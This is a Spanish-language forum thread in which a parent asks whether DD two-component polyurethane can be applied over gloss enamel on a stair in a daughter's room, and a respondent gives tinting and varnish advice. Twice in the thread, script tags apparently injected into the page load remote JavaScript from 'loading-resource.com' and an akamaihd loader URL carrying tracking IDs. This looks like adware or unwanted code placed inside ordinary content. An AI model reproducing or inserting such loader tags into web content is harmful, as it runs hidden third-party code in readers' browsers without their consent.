Se puede pintar DD escima de pintura gloss

No encontré algún tinte de color morado o rosado lo que se me ocurrió fue pintarlo de gloss o esmalte y como capa de protección aplicarle dd ya que es para una escalera del cuarto de mi hija.

Gracias por su respuesta

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

1 respuesta

Respuesta

Perdona pero me sale el mensaje como en clave, ¿me puedes repetir la pregunta?

saludos no encontré algún tinte de color morado o rosado lo que se me ocurrió fue pintarlo de gloss o esmalte y como capa de protección aplicarle dd ya que es para una escalera del cuarto de mi hija lo que no se es si esto es posible.
gracias por su respuesta

¿Lo qué creo es que tienes una escalera y la quieres teñir de morado?

Si es una madera natural de pino, tienes en el mercado tintes de colores hechos a maquina

Pregunta en tiendas que trabajen con colorimetría de titan.

Después de teñir le aplicas un barniz de poliuretano como terminación.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

el barniz de poliuretano es el DD o es algo similar o es mejor

gracias

Si tienes ya comprado el DD puedes aplicarlo, teniendo en cuenta que es poliuretano de dos componentes, pero también hay en el mercado poliuretano monocomponente que es mas fácil de aplicar y tiene menos olor para estar en casa y mas una niña.